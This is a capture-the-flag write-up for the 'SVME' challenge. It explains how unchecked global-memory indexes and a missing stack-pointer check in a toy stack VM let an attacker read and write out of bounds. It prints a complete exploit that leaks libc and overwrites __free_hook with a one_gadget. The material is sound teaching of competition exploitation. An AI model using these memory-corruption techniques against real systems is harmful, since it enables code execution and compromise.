SVME

NoobHacker

Description

Professor Terence Parr has taught us how to build a virtual machine. Now it’s time to break it!

nc 47.243.140.252 1337

Link: https://www.slideshare.net/parrt/how-to-build-a-virtual-machine
Attachment: https://realworldctf-attachment.oss-accelerate.aliyuncs.com/svme_9495bfd34dcaea7af748f1138d5fc25e.tar.gz

Score: 67
Tags: Clone-and-Pwn, Virtual Machine
Difficulty: baby
Solves: 93

Solve

Initial analysis

The attachment given contains the following:

.
├── docker
│ ├── Dockerfile
│ └── main.c
├── libc-2.31.so
└── svme

The binary svme is running on the server, and we have to exploit it. Following is the code for main.c

#include <stdbool.h>
#include <unistd.h>
#include "vm.h"

int main(int argc, char *argv[]) {
    int code[128], nread = 0;
    while (nread < sizeof(code)) {
        int ret = read(0, code+nread, sizeof(code)-nread);
        if (ret <= 0) break;
        nread += ret;
    }
    VM *vm = vm_create(code, nread/4, 0);
    vm_exec(vm, 0, true);
    vm_free(vm);
    return 0;
}

The program reads 128*4 bytes, and calls vm related functions which seem to be in a “vm.h”, but it is not provided to us. Censored1375 from our team found this github repository which contains the source code for the vm related functions.

With some help from 0xBlue, we finally figured out how to run the different instructions. The vm expects every instruction to be an integer. Since size of an integer is 4 bytes, we can execute 128 instructions max, since many instructions require arguments, which have to be integers so 4 bytes each. So we created the following compile.py script to convert instructions to their opcodes which can be directly fed to the program:

#!/usr/bin/env python3
from pwn import *
import struct

vm_instructions = [
    [ "noop",   0 ],
    [ "iadd",   0 ],
    [ "isub",   0 ],
    [ "imul",   0 ],
    [ "ilt",    0 ],
    [ "ieq",    0 ],
    [ "br",     1 ],
    [ "brt",    1 ],
    [ "brf",    1 ],
    [ "iconst", 1 ],
    [ "load",   1 ],
    [ "gload",  1 ],
    [ "store",  1 ],
    [ "gstore", 1 ],
    [ "print",  0 ],
    [ "pop",    0 ],
    [ "call",   3 ],
    [ "ret",    0 ],
    [ "halt",   0 ]
]

f = open('instructions', 'r')
code = ''.join(f.readlines()).lower().strip()
f.close()

f = open('opcodes-compiled', 'wb')

for line in code.split('\n'):
    if line.startswith('#'):
        continue
    for instr in vm_instructions:
        if line.startswith(instr[0]):
            f.write(p32(vm_instructions.index(instr)))
            if ',' in line:
                for i in line.split(',')[1:]:
                    f.write(int(i).to_bytes(4, 'little', signed=True))
            break
f.close()

instructions file:

ICONST,16
PRINT
HALT

output:

$ ./compile.py
$ ./svme < opcodes-compiled
0000:  iconst    16        stack=[ 16 ]
0002:  print               16
stack=[ ]
Data memory:

Vulnerabilites

On digging into the source code, we see two main vulnerabilities:

  1. In the file “vm.c”, the code responsible for reading and writing global variables does not check the index, so we can read/write out of bounds on the heap.
    case GLOAD: // load from global memory
        addr = vm->code[ip++];
        vm->stack[++sp] = vm->globals[addr];
        break;
    case GSTORE:
        addr = vm->code[ip++];
        vm->globals[addr] = vm->stack[sp--];
        break;
  1. There are no checks for the stack pointer variable (sp), so we can underflow the stack and read/write other things on the heap.

State of the heap

state of the heap

The vm struct begins from 0x5555555592a0. The first pointer is a pointer to the stack which is where the input resides. The second dword after the pointer contains the number of instructions read. The 3rd qword from the start is the pointer to the globals, which is just another chunk on the heap, and points to &vm_struct+0x2100. The next qword contains nglobals, which is the number of globals variables which is set to 0 by the program.

Exploitation

At this point we can write anywhere on the heap, and I was stuck at this part for a very long time, not realizing we can also read/write to the stack. How?

We already have a pointer to the stack, so we can overwrite the globals pointer with that stack pointer, and thus read/write to/from the stack using the globals instructions.

# lower bytes of stack addr
GLOAD,-2112
STORE,0
# higher bytes of stack addr
GLOAD,-2111
STORE,1

# reach the heap addr
POP
POP
POP
# load lower bytes
LOAD,0
# load higher bytes
LOAD,1
# now the globals ptr is same as the code ptr

Now we have 2 options:

  1. We can overwrite the return address of main, but for that we will have to restore the heap pointer so that free does not abort.
  2. Overwrite __free_hook in libc.

I chose to go with option 2 though 1 will work as well.

Getting a libc leak

To get a libc leak, we can just read the return address of main. Main is called by __libc_start_main and so returns also to somewhere in the same function.

To find the correct offset, find the address of the return address of main, and subtract the stack pointer from this. To get the address of return address, I used the canary command of pwn-dbg and from there examined the memory near all the canaries and found the correct address.

calculating offset

Thus we can access this value at offset 134 and 135. The following code loads that address, and adds the offset for free hook and stores it.

You can get the offset for free hook using pwntools.

# this gives address of `__libc_start_main+243`, the return addr of main
# lsb
GLOAD,134
# add to get to `__free_hook`
ICONST,1866357
IADD
STORE,0
# msb
GLOAD,135
STORE,1

Get access to free hook

Now we can overwrite the globals pointer to point to free hook so we can use the globals instructions to write an address of one gadget to free hook.

# reach to the globals ptr
POP
POP
# overwrite the globals ptr to address of `__free_hook`
# lsb
LOAD,0
# msb
LOAD,1

Overwrite free hook

The following code now overwrites free hook:

# one_gadgets: 0xe6c7e, 0xe6c81, 0xe6c84
# 2026280 - addr of one_gadget
# sub to get addr of one_gadget
ICONST,1080999
ISUB
GSTORE,0
# msb
LOAD,1
GSTORE,1

Segfault?

If you run the above code, you will most likely get a segfault. Why?
The nglobals variable has been overwritten to some value, so the print data function starts printing out global variables, that is data after the free hook. But it might happen that the page after it has not been mapped, so it will cause a segmentation fault. To avoid this, we can overwrite this variable to 0 again.

# set nglobals to 0 so `vm_print_data` does not interfere
ICONST,0
HALT

Running the exploit

exploit

Full exploit

# lower bytes of stack addr
GLOAD,-2112
STORE,0
# higher bytes of stack addr
GLOAD,-2111
STORE,1

# reach the heap addr
POP
POP
POP
# load lower bytes
LOAD,0
# load higher bytes
LOAD,1
# now the globals ptr is same as the code ptr
# this gives address of `__libc_start_main+243`, the return addr of main
# lsb
GLOAD,134
# add to get to `__free_hook`
ICONST,1866357
IADD
STORE,0
# msb
GLOAD,135
STORE,1

# reach to the globals ptr
POP
POP
# overwrite the globals ptr to address of `__free_hook`
# lsb
LOAD,0
# msb
LOAD,1
# now we can overwrite free hook with globals instructions
# lsb
LOAD,0
# one_gadgets: 0xe6c7e, 0xe6c81, 0xe6c84
# 2026280 - addr of one_gadget
# sub to get addr of one_gadget
ICONST,1080999
ISUB
GSTORE,0
# msb
LOAD,1
GSTORE,1

# set nglobals to 0 so `vm_print_data` does not interfere
ICONST,0
HALT